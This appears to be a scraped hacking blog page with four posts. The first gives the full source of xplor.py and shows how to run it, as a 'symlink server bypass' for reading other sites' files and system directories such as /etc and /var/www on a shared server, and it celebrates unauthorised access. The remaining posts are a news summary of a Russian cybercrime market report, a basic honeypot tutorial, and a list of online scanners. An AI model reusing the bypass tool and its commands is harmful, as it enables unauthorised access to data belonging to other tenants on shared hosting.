1 Server Bypass via Symlink - Jumping in server Part 2

Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/server-bypass-via-symlink-jumping-in.html

-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source

 #!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)

http://pastebin.com/WqmCE2sJ

testing the script python xplor.py

User the tool to view folders where not have any permission to read inside

python xplor.py /var/www/index.php

View the files in no access folder .
python xplor.py /var/www/index.php

copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg


And yeah file it's here


Yeahh fucking access it's granted 


Some thing u can do with those other scripts in perl 
webs.pl
and
xplor.pl


enjoy it :)

0 Russian cybercrime market doubles in size

Russian cybercrime investigation and computer forensics company and LETA Group subsidiary Group-IB released a 28-page report prepared by analysts from its computer forensics lab and its CERT-GIB unit on the Russian cybercrime market in 2011.

The report outlines the main risks associated with various types of hacker activities, analyzes the main trends in the development of the Russian cybercrime market, estimates the shares and the financial performance of the Russian segment of the global cybercrime market, and forecasts market trends for this year.

Key trends in 2011:

Russian cybercrime doubles
The global cybercrime market was more than $12.5 billion in 2011. The global Russian speaking component of that market was more than $4 billion; and the Russian national cybercrime market was $2.3 billion, essentially doubling last year's number of $1.2 billion.

Mafia professionalizes Russian cybercrime
Traditional crime syndicates are beginning to organize the previously disorganized Russian cybercrime market. In addition, these crime syndicates are beginning to work more closely together, sharing compromised data, botnets, and cashing schemes.

Online fraud and spam account for more than half of Russian cybercrime
In 2011, the largest type of Russian cybercrime was online fraud at $942 million; followed by spam at $830 million; cybercrime to cybercrime, or C2C (including services for anonymization and sale of traffic, exploits, malware, and loaders) at $230 million; and DDoS at $130 million.

Criminal profiles
In its report, Group-IB specialists and CERT-GIB analysts profile details of 5 cyber criminals caught in 2011: Vladislav Khorokhorin, Oleg Nikolayenko, Yevgeniy Anikin, Maksim Glotov, Andrey Sabelikov.

Group-IB suggests that Russian laws are critical in getting traction against the global Russian cybercrime market. Although they feel there has been progress with recent laws introduced by Russian President Dmitriy Medvedev and enacted by the Russian State Duma, these laws do not yet go far enough.

The report recommends also steps that will significantly improve the number of solved computer crimes, change the existing law enforcement practices, and establish proper international cooperation in this field.

These recommendations include:

• Clarify language of new laws - Amend the law with an additional conceptual apparatus related to issues of information security and information technologies. For example, the term "botnet" needs to be introduced, perhaps under a different name, which remains and will remain for the foreseeable future the main tool for committing the majority of cybercrimes. In addition, change the term "computer information" in the existing law, which does not fully reflect the nature of computer information, leading to possible incorrect interpretations of this term.
• Increase penalties - Make the penalties for crimes committed using computer technologies more severe.
• Update, amend and augment criminal procedures - Create more effective criminal procedures around gathering "digital evidence" such as describing the procedures and actions related to procuring, securing, and investigating; and creating a separate definition for the crime scene of a cybercrime and establish a specific place of investigation of such crimes.
• Improve law enforcement - Organize federal and regional training programs for the judicial, prosecutorial, investigative, and law enforcement agencies, including seminars regarding the issues of cybercrime investigation.
• Improve international coordination - Develop a document for submission to the UN, establishing the principles of international interaction against cybercrime, while also respecting the sovereignty of the member states, as opposed to the Budapest Convention.

Resource: net-security.org

0 HONEY POT: Hack Hackers

What is HoneyPot??
In layman terms we can say it is a trap set by the administrators for the hackers, to fool them or to make them believe that they are hacking into admins system, but instead of that hackers are getting hacked by the admin.

How does this work??
This works by presenting the hackers a foul scenario where , hacker thinks that he is penetrating into the system but instead, he is going no where except he is playing in the world created by the admins. By doing so, admins are able to check all the malicious activity of the hackers like what all ports hackers are trying to connect, what files they are trying to upload, which all sections they are trying to access.

HonyPot is mainly designed to trap the hackers, or present a virtual system to the hackers which never exists.

Technically, Honeypot tries to listen to all the ports on the system, and whenever hacker tries to port scan the system, it gets a list of open ports which he thinks is open but actually, it is the opened port which is shown by the honeypot behind the firewall, so when ever hacker tries to access some random port say 100, then he is accessing the honeypot not the system,

Above scenario can be visualised better: Install a VM ware on a system and run any low version of windows or linux on it with all ports open, and port forward those ports on the host system, so when ever hacker tries to fingerprint or try to do port scan, then he will be gettng info about the VM ware not the host system, hacker may be able to penetrate into the VM ware OS, but our HOST OS remains safe.

But there are mainly deficulty in doing the above job , so special application is created called HONEYPOT to do this job and many other jobs like tracking of packets, file access etc.

There are mainly 3 types of honeypots available:
1.Small: Mainly keeps the log of ip-address which are trying to access your system alongwith the port
2.Medium: Its functionality is little advanced, keeping track of files accessed, time-period, hosts etc.
3.Large: It provides all the functionality, but the main feature of these kind of Honeypots are security feature, these can simulate virtual os for the outsiders or hackers very well.

In this article I am going to give the example of HoneyPot of small scale for Windows.
HoneyPots are available both on commercial platform and also as open source, I am taking the example of KFsensor which is freely available here.
STEP 1: Download the KFSENSOR and winpcap from their website and install them
STEP 2: Restart your system, start winpcap server from the folder menu where it is saved mainly in c:\ drive
STEP 3: Start KFsensor, do as promted in the window , it is mainly for the configuring of your new HONEYPOT.
STEP4: Done, keep your system up for the packets scanning.

Here in above picture u can see some port numbers are striked out, because you need to restart the system, then start your honeypot, then internet connection, else these ports will be used by net connection first, then this honeypot willnot be able to access these ports, hence no information gathering will be possible.
================================================== ====================
We can also create our small honeypot whose main function is to check for the incoming packets.......
It is nothing but the basic client-server program which listens on all port.

Within minutes of intallation of this small honeypot i got the scanning alert sound, when checked these were the UDP packets mainly left over the internet for scanning of hosts........

0 Online Penetration Tools For Scanning Various Services

subhashdasyam.com released a bunch of online security tools to scan various services and protocols. This could be with a great help if you want to use your Mobile Phone or handheld. However, this is not intended to replace real good scanners or manual techniques. Some scanners are still buggy and can lead you to misinterpretation. So use them with care

Avaible Scanners

• Antivirus Scanner
• Port Scanner
• SSH Scanner
• VNC Scanner
• RDP Scanner
• SQL Injection Dumper

More Info Click Here

Pls Donate for him hard work :) I think are usefull free services